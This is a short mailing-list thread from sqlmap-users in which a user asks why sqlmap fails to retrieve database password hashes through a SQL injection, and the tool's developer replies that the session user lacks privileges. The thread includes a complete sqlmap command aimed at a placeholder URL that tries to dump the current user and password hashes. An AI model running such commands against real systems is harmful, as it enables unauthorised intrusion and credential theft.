but how come i can prompt to sql-shell?
thanks
On Tue, Apr 29, 2014 at 9:10 PM, Miroslav Stampar <
miroslav.stam...@gmail.com> wrote:
> As the error suggests, no sufficient privileges. Common mitigation.
>
> Bye
> On Apr 29, 2014 11:19 AM, "Sabin Ranjit" <think.sa...@gmail.com> wrote:
>
>> hi,
>> I have sql injection, i can get the current user with the --current-user
>> command but when i option for password then sqlmap couldnt do it. it says:
>>
>> [WARNING] in case of continuous data retrieval problems you are advised
>> to try a switch '--no-cast' or switch '--hex'
>> [05:13:51] [WARNING] unable to retrieve the number of password hashes for
>> user 'busroute'
>> [05:13:51] [ERROR] unable to retrieve the password hashes for the
>> database users (most probably because the session user has no read
>> privileges over the relevant system database table)
>> [05:13:51] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 3 times
>>
>> Is this the usual way to mitigate the sqli risk. or this is the sqlmap
>> error that needs to be option in.
>> the used following command:
>> #sqlmap -u http://example.com/br/create?key=1 --dbms="MySQL" --risk=3
>> level=3 -p key --current-user --password --technique=B
>>
>> thanks
>>
>> kind regards,
>>
>>
------------------------------------------------------------------------------
"Accelerate Dev Cycles with Automated Cross-Browser Testing - For FREE
Instantly run your Selenium tests across 300+ browser/OS combos. Get
unparalleled scalability from the best Selenium testing platform available.
Simple to use. Nothing to install. Get started now for free."
http://p.sf.net/sfu/SauceLabs
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
